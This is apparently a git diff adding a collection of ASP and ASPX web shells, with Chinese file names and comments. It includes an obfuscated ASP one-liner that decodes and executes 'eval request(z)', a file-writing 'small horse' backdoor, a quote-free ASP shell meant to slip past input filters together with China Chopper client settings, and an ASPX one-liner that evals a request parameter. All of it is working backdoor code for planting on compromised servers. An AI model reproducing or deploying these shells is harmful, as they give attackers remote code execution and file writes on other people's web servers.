diff --git a/asp/Asp最新变形一句话.asp b/asp/Asp最新变形一句话.asp
new file mode 100644
index 0000000..63bb24b
--- /dev/null
+++ b/asp/Asp最新变形一句话.asp
@@ -0,0 +1,8 @@
+<%
+Function MorfiCoder(Code)
+MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
+End Function
+Execute MorfiCoder(")/*/z/*/(tseuqer lave")
+%>
+
+password:z
\ No newline at end of file
diff --git a/asp/Expdoor.com ASP专用小马.asp b/asp/Expdoor.com ASP专用小马.asp
new file mode 100644
index 0000000..a8c62f9
--- /dev/null
+++ b/asp/Expdoor.com ASP专用小马.asp
@@ -0,0 +1,37 @@
+
Expdoor.com ASP专用小马
+
+<%
+dim s
+if request("action")="set" then
+Text=request("Text")
+FileName=request("FileName")
+set fs=server.CreateObject("Scripting.FileSystemObject") '创建FSO组件
+set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '创建FileName指定的文件
+file.writeline Text '把TEXT逐行写入到文件中,如果没有写
+
+权限,会造成操作失败
+file.close '关闭file
+set file=nothing '释放
+set fs=nothing '释放
+response.write ("") '返回到客户端执行提示保存成功
+end if
+%>
\ No newline at end of file
diff --git a/asp/不带引号的Asp一句话.asp b/asp/不带引号的Asp一句话.asp
new file mode 100644
index 0000000..e4edb5d
--- /dev/null
+++ b/asp/不带引号的Asp一句话.asp
@@ -0,0 +1,9 @@
+发现有些狗特别喜欢在引号前面加“\”
+
+所以找了一个不带引号的Asp一句话
+
+//Asp的
+
+服务端: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>
+
+菜刀配置地址填: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave 密码填0
\ No newline at end of file
diff --git a/aspx/Aspx一句话木马小集.aspx b/aspx/Aspx一句话木马小集.aspx
new file mode 100644
index 0000000..9839b54
--- /dev/null
+++ b/aspx/Aspx一句话木马小集.aspx
@@ -0,0 +1,34 @@
+1k 的
+
+<%@ Page Language="VB" %>
+<%@ import Namespace="System.IO" %>
+
+
+---------------------------
+.net的一句话
+
+<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
+
+
+
+
+
+ ASPX one line Code Client by amxku
+
+
+